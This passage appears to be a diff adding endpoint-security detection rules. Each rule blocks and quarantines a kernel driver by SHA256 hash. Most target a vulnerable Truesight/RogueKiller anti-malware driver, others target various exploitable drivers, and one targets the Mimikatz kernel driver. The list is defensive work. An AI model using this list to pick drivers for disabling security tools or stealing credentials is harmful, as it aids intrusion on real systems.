"last_update": "2026-03-23T11:45:30.830368Z", + "creation_date": "2026-03-23T11:45:30.830370Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8abad96bc2cc4b6388c521671d3c68eed9f88b1e35256f9976974e34a5fe99c5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b29dba2f-df34-50f1-8499-e65d9cc8411b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145642Z", + "creation_date": "2026-03-23T11:45:31.145644Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145649Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7c7bd6b1dee634d5fb234bab0cfe341ff9f2845cddbe59a653366966f603e07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2a2c2d4-db7b-5b92-b9ac-3ad17d783db2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488500Z", + "creation_date": "2026-03-23T11:45:31.488502Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.488507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40a0c1cd71d8b3b4eb83fd39125cc93fd4f11ad82a83c5eabc69b4c38c998504", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2a6d2e4-ddd3-5d5c-bc5e-6f99e8535d90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824163Z", + "creation_date": "2026-03-23T11:45:31.824166Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37e5d3bd6a3aeade27febcd905646de65594601ca3650b2b9d79653f4fde73c5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2a99482-42d5-5f3b-95a6-95fd0b9921b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826612Z", + "creation_date": "2026-03-23T11:45:31.826614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826619Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62400cb2654a27de7b71c9515500836ccedc9708a2c6267129552cc94a9ee31a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2aa9d34-8760-5271-a323-eaa046220692", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142736Z", + "creation_date": "2026-03-23T11:45:31.142738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "044a6623c9c09992ef540cc1ed340840cd97b60568e7a0fea1b73e317fa5a4c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2ace72f-aa44-5bce-afb9-3b505b77b840", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982342Z", + "creation_date": "2026-03-23T11:45:29.982344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982350Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15fb486b6b8c2a2f1b067f48fba10c2f164638fe5e6cee618fb84463578ecac9", + "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2b79da1-5013-536f-860e-1dd3775b40dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811975Z", + "creation_date": "2026-03-23T11:45:31.811977Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811983Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33492b6fb772dfccd9ad5de4590d6f4f85b69557444b9391d306fcf737c4379a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2bd0ba9-736c-52c4-a106-9bdb2aa84e70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824686Z", + "creation_date": "2026-03-23T11:45:30.824689Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe78f5401bdf2128cfd8b18aa9f8ca9dae09a26b90570c2a37c4605b98ab271c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2bd2ea5-4ce1-59f1-80cb-2bb4ab6fd11c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817453Z", + "creation_date": "2026-03-23T11:45:30.817455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d033f5c0a764aa7ecff779cf7fe13140d7d8eb1645dd212f408ed2fa119e3b47", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2be11e3-4779-5a9d-ad29-ab8e071b6d82", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831784Z", + "creation_date": "2026-03-23T11:45:30.831786Z", 
+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831792Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b67d3d080d174ec014ca67e715cdbb9d82dbc8cde08722fa33e8727804e9d6bf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2c4fa1c-93d4-5168-9f01-94df423dca81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482539Z", + "creation_date": "2026-03-23T11:45:31.482542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "348c4503691db331aee05d76b0e092eb8cb7c593bcf0d3ee616bc3a3506d1dd2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"b2cf9a09-d426-5315-a355-c398012f5cbb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809045Z", + "creation_date": "2026-03-23T11:45:31.809047Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809053Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1958544f77fb89a3b7bee11538ee9afc999385bdd3edf9925745ab82c32fcabf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2d87ec1-472b-550a-999b-663285c7310d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835702Z", + "creation_date": "2026-03-23T11:45:30.835704Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.835709Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2130c85eb9084ac6847764452ba207ee7d830020f736695307ad1601dacd4f14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2d899e1-b603-58db-af00-ac699d1807cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970401Z", + "creation_date": "2026-03-23T11:45:29.970404Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970413Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2d2a55a8de6f8310081a59e28e35b51f3687762b86f116c30d0ac79e6821239", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2da8954-f86b-5e1b-baa1-38f1de999333", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809117Z", + "creation_date": "2026-03-23T11:45:31.809119Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "568c6a1caf69392999b7208e31baf08c2090df27e429b594b615b4ffc36c2754", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2df58be-ea26-5d0a-bfea-b71b5c45bd8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983963Z", + "creation_date": "2026-03-23T11:45:29.983965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"453be8f63cc6b116e2049659e081d896491cf1a426e3d5f029f98146a3f44233", + "comment": "Vulnerable Kernel Driver (aka LMIinfo.sys) [https://www.loldrivers.io/drivers/a02ee964-a21e-4b08-9c98-a730c90bfd53/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2e62846-8e34-5c13-97c7-0463638ac223", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472288Z", + "creation_date": "2026-03-23T11:45:31.472291Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472300Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43f3c7c18f1bcacd3459b5ed63eefbcdbb61896bdeecb46fd492ff73556a34e6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2f0d204-8c6d-5d92-82a6-a2c50177bedd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818523Z", + "creation_date": "2026-03-23T11:45:30.818525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a188760f1bf36584a2720014ca982252c6bcd824e7619a98580e28be6090dccc", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2fd89bf-6b34-5a25-b01a-d5dc2a756739", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985181Z", + "creation_date": "2026-03-23T11:45:29.985183Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985188Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3384f4a892f7aa72c43280ff682d85c8e3936f37a68d978d307a9461149192de", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "b310293c-865a-5ff5-b5e6-4308a8518fa4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606456Z", + "creation_date": "2026-03-23T11:45:29.606458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606466Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15484782626c0033d4718fe55370106aaab48fe3cc68695bf7724c5578686531", + "comment": "Vulnerable Kernel Driver (aka nt6.sys) [https://www.loldrivers.io/drivers/e71f0866-e317-44d4-a456-d6f0c555aa73/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b31938f0-6927-5af3-aac3-e7255a59faa6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159574Z", + "creation_date": "2026-03-23T11:45:31.159577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.159586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "75d4cf044e7dbccbe2f601a2dd2fa0428a7d129a77847d91d0cbbaae059338fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b32d8541-3d51-5b28-908f-91c5c4d84fff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494475Z", + "creation_date": "2026-03-23T11:45:31.494477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494482Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4833c38a5ef7256f78e8cd5c6ce5d58795061efbed04de331cc8ff3a2d32dac7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b3342d44-cb03-59bd-b83d-1aab8c2d2911", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820054Z", + "creation_date": "2026-03-23T11:45:31.820057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820065Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ec63ff447a7aa1fc3fe63378410ae4ba5c673b624d1a272308ce3fed47bd00f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b33c4458-7228-53e2-956a-fdc435f88534", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820436Z", + "creation_date": "2026-03-23T11:45:31.820439Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820448Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
